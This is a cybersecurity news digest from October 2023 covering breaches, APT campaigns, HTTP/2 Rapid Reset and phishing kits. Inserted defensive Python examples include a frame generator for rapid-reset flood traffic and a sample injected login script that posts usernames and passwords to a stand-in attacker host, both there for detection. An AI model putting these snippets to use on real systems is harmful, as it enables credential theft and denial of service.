Thursday, October 12th, 2023
Cybersecurity Week in Review (13/10/2023)
MOVEit Saga Drags on as Credit Union Discloses 100K Victims
University Federal Credit Union has admitted a data breach related to this year’s hack of the third-party MOVEit software. The disclosure adds yet another organization to the tally of victims of the cyberattack, which is claimed by the Russia-based Cl0p group.
The notorious ransomware gang had previously listed University Federal Credit Union as one of its victims back in July. Now, that appears to have been borne out by a statement from the organization issued to customers on October 10th.
The credit union said it confirmed the breach after a four-month investigation. It was tipped off by its MOVEit vendor at the time of Cl0p's original attack in May.
“We received notice from one of our vendors, MOVEit, that they experienced a global data security event that allowed unauthorized users access to data stored on their software platform,” said the union.
It notified Maine's attorney general, whose office imposes strict reporting requirements for breaches affecting any state resident, of a breach potentially affecting 102,650 people that exposed financial account numbers and credit and debit card numbers.
However, the union told affected clients that to the best of its knowledge it has “no evidence that any of your information has been used to commit financial fraud.”
That said, it’s also widely understood that such data can and will be used to commit online crimes relating to fraud and identity theft, meaning tens of thousands more Americans must now join the estimated millions already deemed to be at risk from the Cl0p attack.
The union has offered affected parties a year of free identity theft protection services, and urges customers to remain vigilant to the possibility of future attacks leveraging the exposed data.
“We will continue to actively monitor this situation,” it added. “Please remember to remain vigilant in reviewing your financial account statements and credit reports for fraudulent or irregular activity on a regular basis.”
Source – https://cybernews.com/news/moveit-hack-credit-union-discloses-100k-victims/
Air Europa Data Breach: Customers Warned to Cancel Credit Cards
Spanish airline Air Europa, the country’s third-largest airline and a member of the SkyTeam alliance, warned customers on Monday to cancel their credit cards after attackers accessed their card information in a recent data breach.
“We inform you that a cybersecurity incident was recently detected in one of our systems consisting of possible unauthorized access to your bank card data,” Air Europa said in emails sent to affected individuals.
“We have secured our systems, guaranteeing the correct functioning of the service. Additionally, we have made the due notifications to the competent authorities and necessary entities (AEPD, INCIBE, banks, etc.).”
The credit card details exposed in the breach include card numbers, expiration dates, and the 3-digit CVV (Card Verification Value) code on the back of the payment cards.
Air Europa also warned affected customers to ask their banks to cancel their cards used on the airline’s website due to “the risk of card spoofing and fraud” and “to prevent possible fraudulent use.”
Customers were also advised not to provide their personal info or card PINs to anyone contacting them over the phone or via email and not to open any links in emails or messages warning them of fraudulent operations involving their cards.
The company has yet to reveal how many of its customers were affected by the data breach, the date its systems were breached, and when the incident was detected.
Two years ago, in March 2021, the Spanish data protection authority (AEPD) fined the airline €600,000 for violating the European Union's General Data Protection Regulation (GDPR), including notifying the regulator of an earlier data breach more than 40 days after discovering it, well past the 72-hour notification window GDPR sets.
The 2021 data breach affected roughly 489,000 individuals, with the attackers gaining access to their contact details and payment card details (card numbers, expiration dates, and CVV codes) stored in 1,500,000 data records.
Although criminals used the data of around 4,000 cards in fraudulent activities, Air Europa classified the breach as a medium-risk incident and chose not to inform the affected individuals.
Researchers Uncover Grayling APT’s Ongoing Attack Campaign Across Industries
A previously undocumented threat actor of unknown provenance has been linked to a number of attacks targeting organizations in the manufacturing, IT, and biomedical sectors in Taiwan.
The attacks have been attributed by Symantec, which reported the campaign, to an advanced persistent threat (APT) it tracks under the name Grayling. Evidence shows that the campaign began in February 2023 and continued until at least May 2023.
Also likely targeted as part of the activity is a government agency located in the Pacific Islands, as well as entities in Vietnam and the U.S.
The activity stood out due to the use by Grayling of a distinctive DLL side-loading technique that uses a custom decryptor to deploy payloads. The motivation driving this activity appears to be intelligence gathering.
The initial foothold to victim environments is said to have been achieved by exploiting public-facing infrastructure, followed by the deployment of web shells for persistent access.
The attack chains then leverage DLL side-loading via SbieDll_Hook to load a variety of payloads, including Cobalt Strike, NetSpy, and the Havoc framework, alongside other tools like Mimikatz. Grayling has also been observed killing all processes listed in a file called processlist.txt.
DLL side-loading is a popular technique used by a variety of threat actors to get around security solutions and trick the Windows operating system into executing malicious code on the target endpoint.
This is often accomplished by placing a malicious DLL with the same name as a legitimate DLL used by an application in a location where it will be loaded before the actual DLL by taking advantage of the DLL search order mechanism.
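The search-order behaviour described above is what a hunting query for side-loading keys on. The following is an added illustration, not Symantec's detection logic or anything from the Grayling report: it runs two heuristics over image-load records constructed here in the shape of Sysmon Event ID 7 (Image loaded) fields. The first flags a DLL whose file name belongs to a Windows system DLL but is loaded from outside the system directories; the second flags an unsigned DLL loaded from the same user-writable directory as the executable that loads it, the classic side-loading layout. The system DLL set and the path roots are small samples, and the second record is modelled on the SandboxieBITS.exe / SbieDll.dll pairing the text mentions, with a constructed path.

```python
"""Flagging DLL side-loading candidates in image-load telemetry (added example)."""
import ntpath

# Assumed, abbreviated lists; real deployments would use the full KnownDLLs set.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE_ROOTS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
KNOWN_SYSTEM_DLLS = {"version.dll", "dbghelp.dll", "wtsapi32.dll", "userenv.dll",
                     "cryptbase.dll", "uxtheme.dll", "dwmapi.dll"}


def classify(event):
    """Return the reasons an image load looks like side-loading (empty list = benign).

    `event` uses Sysmon Event ID 7 field names: Image (the process executable),
    ImageLoaded (the DLL), Signed ("true"/"false") and SignatureStatus ("Valid", ...).
    """
    exe = event["Image"].lower()
    dll = event["ImageLoaded"].lower()
    exe_dir = ntpath.dirname(exe) + "\\"
    dll_dir = ntpath.dirname(dll) + "\\"
    dll_name = ntpath.basename(dll)
    reasons = []

    # Heuristic 1: a system DLL name resolved from a non-system directory means the
    # loader found an impostor earlier in the search order.
    if dll_name in KNOWN_SYSTEM_DLLS and not dll_dir.startswith(SYSTEM_DIRS):
        reasons.append("system DLL name loaded from non-system path")

    # Heuristic 2: executable and DLL sit together in a user-writable directory and
    # the DLL carries no valid signature (the application directory is searched first).
    dll_unsigned = (event.get("Signed", "false").lower() != "true"
                    or event.get("SignatureStatus", "").lower() != "valid")
    if dll_dir == exe_dir and exe_dir.startswith(USER_WRITABLE_ROOTS) and dll_unsigned:
        reasons.append("unsigned DLL loaded from the executable's own user-writable directory")
    return reasons


def hunt(events):
    """Flatten classify() over a batch of records into (process, dll, reason) hits."""
    return [(e["Image"], e["ImageLoaded"], r) for e in events for r in classify(e)]


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\SandboxieBITS.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\SbieDll.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"Image": r"C:\ProgramData\tool\app.exe",
     "ImageLoaded": r"C:\ProgramData\tool\version.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\vendor.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Both heuristics produce candidates rather than verdicts: a legitimately installed application in ProgramData with an unsigned plugin DLL will trip the second rule, so the output is a hunting lead to be checked against the DLL's hash and the loading executable's signer.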
It’s worth noting that the use of DLL side-loading with respect to SbieDll_Hook and SandboxieBITS.exe was previously observed in the case of Naikon APT in attacks targeting military organizations in Southeast Asia.
There is no evidence to suggest that the adversary has engaged in any form of data exfiltration to date, suggesting the motives are geared more toward reconnaissance and intelligence gathering.
The use of publicly available tools is seen as an attempt to complicate attribution efforts, while process termination indicates detection evasion as a priority for staying under the radar for extended periods of time.
Source – https://thehackernews.com/2023/10/researchers-uncover-grayling-apts.html
New ‘HTTP/2 Rapid Reset’ Zero-day Attack Breaks DDoS Records
A new DDoS (distributed denial of service) technique named ‘HTTP/2 Rapid Reset’ has been actively exploited as a zero-day since August, breaking all previous records in magnitude.
News of the zero-day technique comes as a coordinated announcement between Amazon Web Services, Cloudflare, and Google, who report mitigating attacks reaching 155 million requests per second (Amazon), 201 million rps (Cloudflare), and a record-breaking 398 million rps (Google).
Google says it was able to mitigate the attacks by adding capacity at the edge of its network.
Cloudflare comments that the size of the attack it mitigated is three times bigger than its previous record, from February 2023 (71 million rps), and it’s alarming that this was achieved using a relatively small botnet comprising 20,000 machines.
Since late August, Cloudflare has detected and mitigated over a thousand ‘HTTP/2 Rapid Reset’ DDoS attacks that surpassed 10 million rps, with 184 breaking the previous 71 million rps record. Cloudflare is confident that as further threat actors employ more expansive botnets along with this new attack method, HTTP/2 Rapid Reset attacks will continue to break even greater records.
The attack exploits a weakness in the HTTP/2 protocol itself, tracked as CVE-2023-44487. In short, it abuses HTTP/2's stream cancellation feature: the client opens a request and immediately cancels it, over and over, so the server spends resources on every request while the client never holds enough open streams to be refused.
HTTP/2 does have a safeguard in the form of the SETTINGS_MAX_CONCURRENT_STREAMS parameter, which caps the number of streams a client may have active on one connection; the trouble is that a cancelled stream stops counting against that cap as soon as the cancellation arrives, so the cap is never reached.
Stream cancellation was designed as a cheap way to abandon a single request without tearing down the whole connection, and that efficiency is exactly what makes it abusable.
Since late August attackers have been sending a flood of HTTP/2 requests, each followed by a reset (an RST_STREAM frame), forcing the server to begin processing every request and then discard it, which exhausts its capacity to respond to legitimate incoming requests.
“The protocol does not require the client and server to coordinate the cancelation in any way, the client may do it unilaterally,” explains Google in its post on the issue.
“The client may also assume that the cancellation will take effect immediately when the server receives the RST_STREAM frame, before any other data from that TCP connection is processed.”
Cloudflare says the attacks were eventually mitigated using a system designed to handle hyper-volumetric attacks called ‘IP Jail,’ which it expanded to cover its entire infrastructure. The system “jails” offending IPs and bars them from using HTTP/2 for any Cloudflare domain for a period of time; legitimate users sharing a jailed IP see only a minor performance drop.
Amazon says it mitigated dozens of these attacks without providing any details on their impact, highlighting that the availability of their customer services was maintained.
All three firms conclude that the best approach for clients to counter HTTP/2 Rapid Reset attacks is to use all available HTTP-flood protection tools and bolster their DDoS resilience with multifaceted mitigations.
Unfortunately, as this tactic abuses the HTTP/2 protocol, there is no general fix that entirely blocks attackers from using this DDoS technique. Instead, software developers who utilize the protocol in their software are implementing rate controls to mitigate HTTP/2 Rapid Reset attacks.
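A frame-level model makes the mechanism concrete. The block below is an added example, not code from Google, Cloudflare or AWS: it encodes raw HTTP/2 frames (the 9-byte frame header of RFC 9113 section 4.1), replays them through a per-connection monitor, and shows why the SETTINGS_MAX_CONCURRENT_STREAMS guard never fires during a rapid-reset flood while a reset-rate guard of the kind the text calls "rate controls" does. The HEADERS payload is placeholder bytes rather than HPACK, the thresholds are assumptions, and the window is counted in frames rather than time so the example is deterministic offline.

```python
"""Frame-level model of HTTP/2 Rapid Reset (CVE-2023-44487), added illustration."""
from collections import deque

FRAME_HEADERS = 0x1        # opens a stream (a client request)
FRAME_RST_STREAM = 0x3     # cancels a stream; payload is a 4-byte error code
ERR_CANCEL = 0x8
FLAG_END_STREAM = 0x1
FLAG_END_HEADERS = 0x4
FRAME_HEADER_LEN = 9

MAX_CONCURRENT_STREAMS = 100  # assumed server SETTINGS_MAX_CONCURRENT_STREAMS
RESET_WINDOW_FRAMES = 200     # assumed: sliding window measured in frames
MAX_RESETS_PER_WINDOW = 50    # assumed: resets tolerated inside that window


def build_frame(ftype, stream_id, payload=b"", flags=0):
    """Encode one frame: 24-bit length, 8-bit type, 8-bit flags, 31-bit stream id."""
    return (len(payload).to_bytes(3, "big") + bytes([ftype, flags])
            + (stream_id & 0x7FFFFFFF).to_bytes(4, "big") + payload)


def parse_frames(data):
    """Yield (type, flags, stream_id, payload) for every complete frame in data."""
    off = 0
    while off + FRAME_HEADER_LEN <= len(data):
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags = data[off + 3], data[off + 4]
        stream_id = int.from_bytes(data[off + 5:off + 9], "big") & 0x7FFFFFFF
        payload = data[off + FRAME_HEADER_LEN:off + FRAME_HEADER_LEN + length]
        if len(payload) != length:
            raise ValueError("truncated frame at offset %d" % off)
        yield ftype, flags, stream_id, payload
        off += FRAME_HEADER_LEN + length


class ConnectionMonitor:
    """Per-connection accounting for a single client TCP connection."""

    def __init__(self):
        self.open_streams = set()
        self.peak_concurrent = 0
        self.frames_seen = 0
        self.total_resets = 0
        self.reset_positions = deque()   # frame indexes of recent RST_STREAMs

    def feed(self, ftype, stream_id):
        """Return a verdict string when a guard trips, else None."""
        self.frames_seen += 1
        if ftype == FRAME_HEADERS and stream_id not in self.open_streams:
            self.open_streams.add(stream_id)
            self.peak_concurrent = max(self.peak_concurrent, len(self.open_streams))
            if len(self.open_streams) > MAX_CONCURRENT_STREAMS:
                return "MAX_CONCURRENT_STREAMS exceeded"   # the protocol's own safeguard
        elif ftype == FRAME_RST_STREAM:
            # The cancelled stream stops counting immediately, so the concurrency
            # guard above is back at zero before the next HEADERS frame arrives.
            self.open_streams.discard(stream_id)
            self.total_resets += 1
            self.reset_positions.append(self.frames_seen)
            while self.reset_positions[0] <= self.frames_seen - RESET_WINDOW_FRAMES:
                self.reset_positions.popleft()
            if len(self.reset_positions) >= MAX_RESETS_PER_WINDOW:
                return "reset flood"   # the added rate control
        return None


def analyze(data):
    """Replay a raw frame stream and report the first verdict plus counters."""
    mon = ConnectionMonitor()
    verdict = None
    for ftype, _flags, stream_id, _payload in parse_frames(data):
        hit = mon.feed(ftype, stream_id)
        if hit and verdict is None:
            verdict = hit
    return {"verdict": verdict, "peak_concurrent": mon.peak_concurrent,
            "resets": mon.total_resets, "frames": mon.frames_seen}


def rapid_reset_client(requests):
    """Constructed attacker traffic: each HEADERS is followed at once by RST_STREAM(CANCEL)."""
    out = bytearray()
    for i in range(requests):
        sid = 2 * i + 1   # client-initiated stream ids are odd
        out += build_frame(FRAME_HEADERS, sid, b"GET /", FLAG_END_HEADERS | FLAG_END_STREAM)
        out += build_frame(FRAME_RST_STREAM, sid, ERR_CANCEL.to_bytes(4, "big"))
    return bytes(out)


def greedy_client(requests):
    """Constructed traffic that opens streams and never cancels them."""
    return b"".join(build_frame(FRAME_HEADERS, 2 * i + 1, b"GET /",
                                FLAG_END_HEADERS | FLAG_END_STREAM)
                    for i in range(requests))


if __name__ == "__main__":
    print(analyze(rapid_reset_client(500)))   # reset flood, peak concurrency 1
    print(analyze(greedy_client(500)))        # concurrency cap trips, no resets
```

The greedy client is caught by the concurrency cap after 101 open streams; the rapid-reset client never has more than one stream open, so only the reset counter sees it. In production the window would be time-based and the action taken on a verdict (closing the connection, refusing HTTP/2 for the source address for a while, as Cloudflare's IP Jail does) depends on the deployment.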
DC Board of Elections Discloses Data Breach
The District of Columbia Board of Elections (DCBOE) on Friday confirmed that voter records were compromised in a data breach at a third-party services provider. An independent agency of the District of Columbia Government, the DCBOE is responsible for the administration of ballot access, elections, and voter registration.
“On 10/5, DCBOE became aware of a cybersecurity incident involving DC voter records. While the incident remains under investigation, DCBOE’s internal databases and servers were not compromised,” the agency announced on Friday.
According to DCBOE’s official statement, the data breach occurred at DataNet, which provides website hosting services to the agency. The incident came to light after a relatively new ransomware group named RansomedVC claimed to have breached DCBOE’s systems, exfiltrating more than 600,000 lines of US voter records.
The stolen information, DataBreaches reports, includes names, driver’s license numbers, phone numbers, birth dates, addresses, email addresses, partial Social Security numbers, voter IDs, registration dates, political party affiliation, and polling place.
Most of the compromised information, DCBOE notes in its official statement, is typically public, except for cases where “it has been made confidential in accordance with District of Columbia rules and regulations”. By law, this information can be easily obtained from DCBOE upon request.
The agency also says that, after learning of the data breach, it immediately launched an investigation, with assistance from data security and federal government partners, including MS-ISAC, the FBI, DHS, and OCTO.
DCBOE also took down its website, replacing it with a maintenance page, and conducted vulnerability scans on its database, server, and IT networks.
“DCBOE continues to assess the full extent of the breach, identify vulnerabilities, and take appropriate measures to secure voter data and systems,” the agency notes, promising additional information as it becomes available.
RansomedVC says it plans to sell the stolen data – not all of which can be obtained legally from DCBOE – to a single buyer, but did not share details on the price.
The hacking group recently claimed to have breached Sony’s systems, obtaining source code, access to Sony applications, and confidential documents. Sony told SecurityWeek that it has identified unauthorized activity on a single server located in Japan.
Source – https://www.securityweek.com/dc-board-of-elections-discloses-data-breach/
PEACHPIT: Massive Ad Fraud Botnet Powered by Millions of Hacked Android and iOS
An ad fraud botnet dubbed PEACHPIT leveraged an army of hundreds of thousands of Android and iOS devices to generate illicit profits for the threat actors behind the scheme.
The botnet is part of a larger China-based operation codenamed BADBOX, which also entails selling off-brand mobile and connected TV (CTV) devices on popular online retailers and resale sites that are backdoored with an Android malware strain called Triada.
The PEACHPIT botnet’s conglomerate of associated apps were found in 227 countries and territories, with an estimated peak of 121,000 devices a day on Android and 159,000 devices a day on iOS.
The infections are said to have been realized through a collection of 39 apps that were installed more than 15 million times. Devices fitted with the BADBOX malware allowed the operators to steal sensitive data, create residential proxy exit peers, and commit ad fraud through the bogus apps.
It’s currently not clear how the Android devices are compromised with a firmware backdoor, but evidence points to a hardware supply chain attack of a Chinese manufacturer.
Details about the criminal enterprise were first documented by Trend Micro in May 2023, which attributed it to an adversary it tracks as Lemon Group.
At least 200 distinct Android device types, including mobile phones, tablets, and CTV products, were identified to have exhibited signs of BADBOX infection, suggesting a widespread operation.
A notable aspect of the ad fraud is the use of counterfeit apps on Android and iOS made available on major app marketplaces such as the Apple App Store and Google Play Store as well as those that are automatically downloaded to backdoored BADBOX devices.
Present within the Android apps is a module responsible for creating hidden WebViews that are then used to request, render, and click on ads, masquerading the ad requests as originating from legitimate apps, a technique previously observed in the case of VASTFLUX.
HUMAN Security, the fraud prevention firm that uncovered the scheme, noted that it worked with Apple and Google to disrupt the operation, adding “the remainder of BADBOX should be considered dormant: the C2 servers powering the BADBOX firmware backdoor infection have been taken down by the threat actors.”
What’s more, an update pushed out earlier this year has been found to remove the modules powering PEACHPIT on BADBOX-infected devices in response to mitigation measures deployed in November 2022.
That being said, it’s suspected the attackers are adjusting their tactics in a likely attempt to circumvent the defenses.
Source – https://thehackernews.com/2023/10/peachpit-massive-ad-fraud-botnet.html
Credential Harvesting Campaign Targets Unpatched NetScaler Instances
A credential harvesting campaign is targeting Citrix NetScaler gateways that have not been patched against a recent vulnerability, IBM reports.
Tracked as CVE-2023-3519 (CVSS score of 9.8), the vulnerability was disclosed in July, but had been exploited since June 2023, with some of the attacks targeting critical infrastructure organizations.
By mid-August, threat actors exploited this vulnerability as part of an automated campaign, backdooring roughly 2,000 NetScaler instances. At least 1,350 NetScaler instances compromised in previous attacks were appearing in scans last week.
In September, IBM observed a new malicious campaign targeting unpatched NetScaler devices to inject a script on the authentication page and steal user credentials.
As part of the observed attacks, a threat actor is exploiting CVE-2023-3519 to inject a PHP web shell, which then allows them to append custom HTML code to the legitimate ‘index.html’ file, to load a JavaScript file hosted on the attacker’s infrastructure on the VPN authentication page.
The JavaScript fetches and runs additional code to attach a custom function on the ‘Log_On’ element, meant to collect the username and password supplied by the user and send it to a remote server.
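The injection described above leaves a small but distinctive footprint in the served HTML, which is what a hunt for it should key on. The block below is an added example, not IBM's tooling and not the attacker's script: it parses the HTML of a login page, flags any `<script src>` that loads from a host outside an allowlist, flags inline script that both touches the Log_On element and ships data off the page, and compares the file against a known-good hash as the cheapest first check. The sample pages, the script path and the host attacker.example are all constructed; the inline variant is included only so that both detections are exercised.

```python
"""Hunting for an injected credential-harvesting script on a login page (added example)."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from an HTML document."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


LOGIN_FORM_RE = re.compile(r"\bLog_On\b")
EXFIL_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b|\.src\s*=")


def audit_login_page(html, allowed_hosts=frozenset()):
    """Return (finding, detail) tuples; an empty list means nothing suspicious was seen."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host and host not in allowed_hosts:      # a relative src is same-origin
            findings.append(("external-script", src))
    for body in parser.inline:
        if LOGIN_FORM_RE.search(body) and EXFIL_RE.search(body):
            findings.append(("login-hook", " ".join(body.split())[:80]))
    return findings


def matches_baseline(html, known_sha256):
    """True if the page is byte-identical to the vetted copy taken after patching."""
    return hashlib.sha256(html.encode()).hexdigest() == known_sha256


# Constructed sample of a clean login page (not an actual NetScaler file).
CLEAN_PAGE = """<html><head><title>Gateway</title>
<script src="/vpn/js/login.js"></script></head>
<body><form id="Log_On" method="post" action="/cgi/login">
<input name="login"><input name="passwd" type="password"></form></body></html>"""

# Constructed: the same page with an appended external loader, as the report describes,
# plus an inline hook so that both detections fire.
INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<script src="https://attacker.example/assets/shared.js"></script>
<script>
document.getElementById('Log_On').addEventListener('submit', function (e) {
  fetch('https://attacker.example/c', {method: 'POST',
    body: JSON.stringify({u: e.target.login.value, p: e.target.passwd.value})});
});
</script></body>""")

BASELINE = hashlib.sha256(CLEAN_PAGE.encode()).hexdigest()

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, matches_baseline(page, BASELINE), audit_login_page(page))
```

Run it against the page as fetched from the appliance over HTTPS rather than the file on disk, since a web shell can serve content that differs from what is stored; and treat any hash mismatch as a finding to be diffed, not just a flag.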
As part of the campaign, the threat actor created numerous domains and registered them in August, abusing Cloudflare to hide their hosting location.
IBM says that it has identified “at least 600 unique victim IP addresses hosting modified NetScaler Gateway login pages,” most of them located in the US and Europe. According to Shadowserver’s scans, there are at least 285 NetScaler instances compromised in this campaign.
The first infections likely occurred on August 11, though the campaign “could have begun closer to when the domains were registered”, on August 4, IBM says.
The JavaScript files observed in these attacks are almost identical, with the command-and-control (C&C) server address being the only difference between them. The collected credentials have all been sent to the same URL.
IBM has retrieved some of the web shells and modified versions of the ‘index.html’ file and is providing information on the indicators of compromise (IoCs) that organizations should look for when hunting for potential targeting of their NetScaler instances.
According to IBM, organizations should consider not only patching their NetScaler gateways, but also changing all their certificates and passwords as part of their remediation efforts.
Source – https://www.securityweek.com/credential-harvesting-campaign-targets-unpatched-netscaler-instances/
Cybercriminals Using EvilProxy Phishing Kit to Target Senior Executives in U.S. Firms
Senior executives working in U.S.-based organizations are being targeted by a new phishing campaign that leverages a popular adversary-in-the-middle (AiTM) phishing toolkit named EvilProxy to conduct credential harvesting and account takeover attacks.
Menlo Security said the activity started in July 2023, primarily singling out banking and financial services, insurance, property management and real estate, and manufacturing sectors.
EvilProxy, first documented in September 2022, functions as a reverse proxy that’s set up between the target and a legitimate login page to intercept credentials, two-factor authentication (2FA) codes, and session cookies to hijack accounts of interest.
The threat actors behind the AiTM phishing kit are tracked by Microsoft under the moniker Storm-0835 and are estimated to have hundreds of customers.
“These cyber criminals pay monthly license fees ranging from $200 to $1,000 USD and carry out daily phishing campaigns,” the tech giant said. “Because so many threat actors use these services, it is impractical to attribute campaigns to specific actors.”
In the latest set of attacks, victims are sent phishing emails with a deceptive link pointing to Indeed, which, in turn, redirects the individual to an EvilProxy page to harvest the credentials entered.
This is accomplished by taking advantage of an open redirect flaw, which occurs when a failure to validate user input causes a vulnerable website to redirect users to arbitrary web pages, bypassing security guardrails.
The parameters following the ‘?’ in the URL are a combination of parameters specific to indeed.com and a target parameter whose value is the destination URL. In the illustrative link, that destination is example.com, so a user who clicks it is simply redirected there; in an actual attack, the destination is the phishing page.
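The same structure can be checked from both sides: in mail filtering, by pulling the off-site destination out of a bouncer link, and in the redirecting application, by refusing to follow a target that leaves the site. The block below is an added example, not Menlo Security's or Indeed's code. `external_redirect_in_link()` looks for the destination in a redirect-style query parameter, `vulnerable_redirect()` is the flaw itself, and `safe_redirect()` is the same-origin check that closes it. The hosts jobs.example and login.attacker.example and the path `/rc/clk` are constructed, and the parameter names are common ones rather than a complete list.

```python
"""Open-redirect abuse: spotting it in a link and closing it on the server (added example)."""
from urllib.parse import parse_qs, urljoin, urlparse

# Assumed: typical names a redirector reads its destination from (not exhaustive).
REDIRECT_PARAMS = ("target", "url", "redirect", "redirect_url", "next", "return", "u")


def external_redirect_in_link(link):
    """Return the off-site URL a bouncer link would send the user to, or None."""
    outer = urlparse(link)
    params = parse_qs(outer.query)
    for name in REDIRECT_PARAMS:
        for value in params.get(name, []):
            inner = urlparse(value)
            if (inner.scheme in ("http", "https") and inner.hostname
                    and inner.hostname != outer.hostname):
                return value
    return None


def vulnerable_redirect(target):
    """The flaw: whatever the client put in the parameter becomes the Location header."""
    return target


def safe_redirect(target, site_host="jobs.example"):
    """Resolve target against the site and follow it only if it stays on the site."""
    base = f"https://{site_host}/"
    if "\\" in target:            # browsers treat "/\" like "//"; urljoin does not
        return base
    dest = urlparse(urljoin(base, target))
    # netloc (not hostname) so userinfo and port tricks are rejected too
    if dest.scheme != "https" or dest.netloc.lower() != site_host:
        return base
    return dest.geturl()


# Constructed phishing link: a legitimate-looking host with an off-site target.
PHISH_LINK = "https://jobs.example/rc/clk?jk=abc123&target=https://login.attacker.example/"

if __name__ == "__main__":
    print(external_redirect_in_link(PHISH_LINK))
    for t in ("https://login.attacker.example/", "//login.attacker.example/",
              "/account?ref=1", "javascript:alert(1)",
              "https://jobs.example@login.attacker.example/", "/\\login.attacker.example"):
        print(repr(t), "->", vulnerable_redirect(t), "|", safe_redirect(t))
```

The hardened handler rejects the absolute, protocol-relative, userinfo, backslash and non-HTTPS forms and only passes through a path on the site itself; if the application genuinely needs to redirect to other hosts, the fix is an allowlist of those hosts or a signed redirect token, not a looser version of this check.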
The development arrives as threat actors are leveraging Dropbox to create fake login pages with embedded URLs that, when clicked, redirect users to bogus sites that are designed to steal Microsoft account credentials as part of a business email compromise (BEC) scheme.
Source – https://thehackernews.com/2023/10/cybercriminals-using-evilproxy-phishing.html
ALPHV Ransomware Gang Claims Attack on Florida Circuit Court
The ALPHV (BlackCat) ransomware gang has claimed an attack that affected state courts across Northwest Florida (part of the First Judicial Circuit) last week. Allegedly, the threat actors have acquired personal details like Social Security numbers and CVs of employees, including judges.
Additionally, ALPHV claims to possess a comprehensive network map of the court’s systems, complete with local and remote service credentials. Ransomware gangs commonly threaten to leak stolen data online to coerce victims into negotiation or reopening discussions.
The presence of Florida’s First Judicial Circuit’s data leak page on ALPHV’s website suggests that the court has either not engaged in negotiations with the ransomware operation or has firmly declined to meet the gang’s demands.
The Florida circuit court disclosed last week that it was investigating a cyberattack that disrupted its operations on Monday morning, October 2nd.
“This event will significantly affect court operations across the Circuit, impacting courts in Escambia, Okaloosa, Santa Rosa, and Walton counties, for an extended period,” a statement published on the court’s website says.
“The Circuit is prioritizing essential court proceedings but will cancel and reschedule other proceedings and pause related operations for several days, beginning Monday, October 2, 2023.”
Amid the ongoing investigation into the attack, judges in the four counties have been communicating with litigants and attorneys regarding their weekly scheduled hearings. Additionally, the court authorities confirmed that all facilities continue operating without disruptions. The court has not yet verified the ransomware attack claims made by the ALPHV gang.
The BlackCat/ALPHV ransomware operation surfaced in November 2021 and is believed to be a rebranding of DarkSide/BlackMatter. Initially known as DarkSide, the group gained international attention following the breach of Colonial Pipeline, leading to scrutiny from law enforcement agencies globally.
After rebranding again as BlackMatter in July 2021, their operations abruptly ceased in November 2021 when authorities seized their servers, and security firm Emsisoft created a decryptor exploiting a ransomware vulnerability.
This ransomware operation is known for consistently targeting global enterprises and continuously adapting and refining their tactics.
In a recent incident, an affiliate tracked as Scattered Spider claimed responsibility for the attack on MGM Resorts, claiming to have encrypted over 100 ESXi hypervisors after the company shut down internal infrastructure and declined to negotiate a ransom.
Gaza-Linked Cyber Threat Actor Targets Israeli Energy and Defense Sectors
A Gaza-based threat actor has been linked to a series of cyber attacks aimed at Israeli private-sector energy, defense, and telecommunications organizations. Microsoft, which revealed details of the activity in its fourth annual Digital Defense Report, is tracking the campaign under the name Storm-1133.
“We assess this group works to further the interests of Hamas, a Sunni militant group that is the de facto governing authority in the Gaza Strip, as activity attributed to it has largely affected organizations perceived as hostile to Hamas,” the company said.
Targets of the campaign included organizations in the Israeli energy and defense sectors and entities loyal to Fatah, a Palestinian nationalist and social democratic political party headquartered in the West Bank region.
Attack chains entail a mix of social engineering and fake LinkedIn profiles that masquerade as Israeli human resources managers, project coordinators, and software developers, used to contact employees at Israeli organizations, send phishing messages, conduct reconnaissance, and deliver malware.
Microsoft said it also observed Storm-1133 attempting to infiltrate third-party organizations with public ties to Israeli targets of interest. These intrusions are designed to deploy backdoors, alongside a configuration that allows the group to dynamically update the command-and-control (C2) infrastructure hosted on Google Drive.
The disclosure overlaps with an escalation in the Israeli-Palestinian conflict, which has been accompanied by a surge in malicious hacktivist operations such as Ghosts of Palestine that aim to bring down government websites and IT systems in Israel, the U.S., and India.
The development also comes as nation-state threats have shifted away from destructive and disruptive operations to long-term espionage campaigns, with the U.S., Ukraine, Israel, and South Korea emerging as some of the most targeted nations in Europe, Middle East and North Africa (MENA), and Asia-Pacific regions.
This evolving tradecraft is evidenced by the recurring use of custom tools and backdoors – e.g., MischiefTut by Mint Sandstorm (aka Charming Kitten) – to facilitate persistence, detection evasion, and credential theft.
Source – https://thehackernews.com/2023/10/gaza-linked-cyber-threat-actor-targets.html